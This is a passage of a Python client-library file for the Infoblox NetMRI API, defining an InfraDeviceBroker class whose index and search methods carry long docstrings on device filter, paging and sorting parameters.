| 48.923611 | 150 | 0.667991 | 929 | 7,045 | 4.768568 | 0.166846 | 0.074492 | 0.0614 | 0.037923 | 0.832506 | 0.815576 | 0.799549 | 0.793228 | 0.773363 | 0.762077 | 0 | 0.007193 | 0.111994 | 7,045 | 143 | 151 | 49.265734 | 0.700927 | 0.105181 | 0 | 0.59 | 0 | 0 | 0.14909 | 0.048755 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.13 | null | null | 0.01 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
83ebeabed6d5fbae7e8854fee5f3a5b6c11a3a5e | 212,113 | py | Python | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | infoblox_netmri/api/broker/v3_6_0/infra_device_broker.py | IngmarVG-IB/infoblox-netmri | b0c725fd64aee1890d83917d911b89236207e564 | [
"Apache-2.0"
] | null | null | null | from ..broker import Broker
class InfraDeviceBroker(Broker):
controller = "infra_devices"
def index(self, **kwargs):
"""Lists the available infra devices. Any of the inputs listed may be be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
:param sort: The data field(s) to use for sorting the output. Default is DeviceID. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each InfraDevice. Valid values are DataSourceID, DeviceID, InfraDeviceStartTime, InfraDeviceEndTime, InfraDeviceChangedCols, DeviceIPDotted, DeviceIPNumeric, DeviceName, DeviceType, DeviceAssurance, DeviceVendor, DeviceModel, DeviceVersion, DeviceSysName, DeviceSysDescr, DeviceSysLocation, DeviceSysContact, DeviceDNSName, DeviceConfigTimestamp, DeviceFirstOccurrenceTime, InfraDeviceTimestamp, DeviceSAAVersion, DeviceRebootTime, DeviceRunningConfigLastChangedTime, DeviceSavedConfigLastChangedTime, DeviceConfigLastCheckedTime, DevicePolicyScheduleMode, DeviceAddlInfo, DeviceMAC, ParentDeviceID, DeviceContextName, DeviceNetBIOSName, DeviceOUI, MgmtServerDeviceID, NetworkDeviceInd, RoutingInd, SwitchingInd, VirtualInd, FilteringInd, FilterProvisionData, VirtualNetworkID, VirtualNetworkingInd, DeviceUniqueKey. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
| ``api version min:`` 2.10
| ``api version max:`` None
| ``required:`` False
| ``default:`` False
:param detail_ind: A flag to indicate whether discovery times should be included or not
:type detail_ind: Boolean
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return infra_devices: An array of the InfraDevice objects that match the specified input criteria.
:rtype infra_devices: Array of InfraDevice
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
def search(self, **kwargs):
"""Lists the available infra devices matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field.
:type DeviceAddlInfo: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceAddlInfo: Additional information about the device; IP phones will contain the extension in this field.
:type DeviceAddlInfo: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceAssurance: The assurance level of the device type value.
:type DeviceAssurance: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceAssurance: The assurance level of the device type value.
:type DeviceAssurance: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file.
:type DeviceConfigLastCheckedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceConfigLastCheckedTime: The date/time of the last attempted retrieval of the device's configuration file.
:type DeviceConfigLastCheckedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device.
:type DeviceConfigTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceConfigTimestamp: The date/time the configuration file was last successfully retrieved for this device.
:type DeviceConfigTimestamp: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceContextName: The name of the virtual context of this virtual device.
:type DeviceContextName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceContextName: The name of the virtual context of this virtual device.
:type DeviceContextName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceDNSName: The device name as reported by DNS.
:type DeviceDNSName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceDNSName: The device name as reported by DNS.
:type DeviceDNSName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceFirstOccurrenceTime: The date/time that this device was first seen on the network.
:type DeviceFirstOccurrenceTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: An internal NetMRI identifier for the device.
:type DeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPDotted: The management IP address of the device, in dotted (or colon-delimited for IPv6) format.
:type DeviceIPDotted: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceIPNumeric: The numerical value of the device IP address.
:type DeviceIPNumeric: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used.
:type DeviceMAC: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceMAC: The MAC of the interface corresponding to the management IP, if available. Otherwise, it is the lowest numbered non-zero MAC for any interface on the device. If no interface records are available for the device, the lowest non-zero MAC address corresponding to the management IP address found in the global ARP table will be used.
:type DeviceMAC: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceModel: The device model name.
:type DeviceModel: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceModel: The device model name.
:type DeviceModel: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceName: The NetMRI name of the device; this will be either the same as DeviceSysName or DeviceDNSName, depending on your NetMRI configuration.
:type DeviceName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceNetBIOSName: The NetBIOS name of the device.
:type DeviceNetBIOSName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceNetBIOSName: The NetBIOS name of the device.
:type DeviceNetBIOSName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceOUI: The NetMRI-determined device vendor using OUI.
:type DeviceOUI: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceOUI: The NetMRI-determined device vendor using OUI.
:type DeviceOUI: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DevicePolicyScheduleMode: Not currently used.
:type DevicePolicyScheduleMode: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DevicePolicyScheduleMode: Not currently used.
:type DevicePolicyScheduleMode: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRebootTime: The date/time this device was last rebooted.
:type DeviceRebootTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed.
:type DeviceRunningConfigLastChangedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceRunningConfigLastChangedTime: The date/time, as reported by SNMP, that the device's running configuration was last changed.
:type DeviceRunningConfigLastChangedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSAAVersion: The SAA version running on this device.
:type DeviceSAAVersion: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSAAVersion: The SAA version running on this device.
:type DeviceSAAVersion: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed.
:type DeviceSavedConfigLastChangedTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSavedConfigLastChangedTime: The date/time, as reported by SNMP, that the device's saved configuration was last changed.
:type DeviceSavedConfigLastChangedTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysContact: The Device sysContact as reported by SNMP.
:type DeviceSysContact: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysContact: The Device sysContact as reported by SNMP.
:type DeviceSysContact: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysDescr: The device sysDescr as reported by SNMP.
:type DeviceSysDescr: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysDescr: The device sysDescr as reported by SNMP.
:type DeviceSysDescr: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysLocation: The device sysLocation as reported by SNMP.
:type DeviceSysLocation: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysLocation: The device sysLocation as reported by SNMP.
:type DeviceSysLocation: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceSysName: The device name as reported by SNMP.
:type DeviceSysName: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceSysName: The device name as reported by SNMP.
:type DeviceSysName: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceType: The NetMRI-determined device type.
:type DeviceType: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceUniqueKey: Unique key which allows duplicates detecting over different Virtual Networks.
:type DeviceUniqueKey: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceUniqueKey: Unique key which allows duplicates detecting over different Virtual Networks.
:type DeviceUniqueKey: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceVendor: The device vendor name.
:type DeviceVendor: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceVendor: The device vendor name.
:type DeviceVendor: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceVersion: The device OS version.
:type DeviceVersion: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceVersion: The device OS version.
:type DeviceVersion: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param FilterProvisionData: Internal data - do not modify, may change without warning.
:type FilterProvisionData: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilterProvisionData: Internal data - do not modify, may change without warning.
:type FilterProvisionData: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param FilteringInd: A flag indicating whether this device is eligible for Security Device Controller
:type FilteringInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param FilteringInd: A flag indicating whether this device is eligible for Security Device Controller
:type FilteringInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision.
:type InfraDeviceChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceChangedCols: The fields that changed between this revision of the record and the previous revision.
:type InfraDeviceChangedCols: Array of String
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type InfraDeviceEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type InfraDeviceEndTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceStartTime: The starting effective time of this revision of the record.
:type InfraDeviceStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceStartTime: The starting effective time of this revision of the record.
:type InfraDeviceStartTime: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InfraDeviceTimestamp: The date and time this record was collected.
:type InfraDeviceTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InfraDeviceTimestamp: The date and time this record was collected.
:type InfraDeviceTimestamp: Array of DateTime
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param MgmtServerDeviceID: The Device ID of the management server for the device
:type MgmtServerDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param MgmtServerDeviceID: The Device ID of the management server for the device
:type MgmtServerDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating whether this device is a network device or an end host.
:type NetworkDeviceInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkDeviceInd: A flag indicating whether this device is a network device or an end host.
:type NetworkDeviceInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ParentDeviceID: The internal NetMRI identifier for the device containing this virtual device.
:type ParentDeviceID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device.
:type RoutingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param RoutingInd: A flag indicating whether this device is configured with any routing capability and whether a routing table was retrieved from this device.
:type RoutingInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device.
:type SwitchingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SwitchingInd: A flag indicating whether a switch port forwarding table was retrieved from this device.
:type SwitchingInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualInd: A flag indicating if the source device is a virtual device.
:type VirtualInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualInd: A flag indicating if the source device is a virtual device.
:type VirtualInd: Array of Boolean
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkID: The internal NetMRI identifier of the Virtual Network to which the management address of this device belongs.
:type VirtualNetworkID: Array of Integer
| ``api version min:`` 2.4
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param VirtualNetworkingInd: Set to null, 0 or 1. 0 indicates this is not a VRF Aware device. 1 Indicates it is VRF Aware.
:type VirtualNetworkingInd: Boolean
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param VirtualNetworkingInd: Set to null, 0 or 1. 0 indicates this is not a VRF Aware device. 1 Indicates it is VRF Aware.
:type VirtualNetworkingInd: Array of Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the infra devices as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of infra device methods. The listed methods will be called on each infra device returned and included in the output. Available methods are: DeviceCommunitySecure, DeviceRank, DeviceCommunity, DeviceFirstOccurrence, group, parent_device, gateway_device, running_config, running_config_text, saved_config, saved_config_text, running_config_diff, saved_config_diff, virtual_child_count, asset_type, device_setting, data_collection_status, control_capabilities, network_name, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, privileged_polling, DeviceStartTime, DeviceEndTime, cap_description_ind, cap_admin_status_ind, cap_vlan_assignment_ind, cap_voice_vlan_ind, cap_net_provisioning_ind, cap_net_vlan_provisioning_ind, cap_net_deprovisioning_ind, cap_description_na_reason, cap_admin_status_na_reason, cap_vlan_assignment_na_reason, cap_voice_vlan_na_reason, cap_net_provisioning_na_reason, cap_net_vlan_provisioning_na_reason, cap_net_deprovisioning_na_reason, chassis_serial_number, available_mgmt_ips, rawSysDescr, rawSysVersion, rawSysModel, data_source, device.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: parent_device, device_setting, data_collection_status, interfaces, issue_details, device_routes, device_physicals, if_addrs, config_revisions, detected_changes, device_ports, data_source, device.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` DeviceID
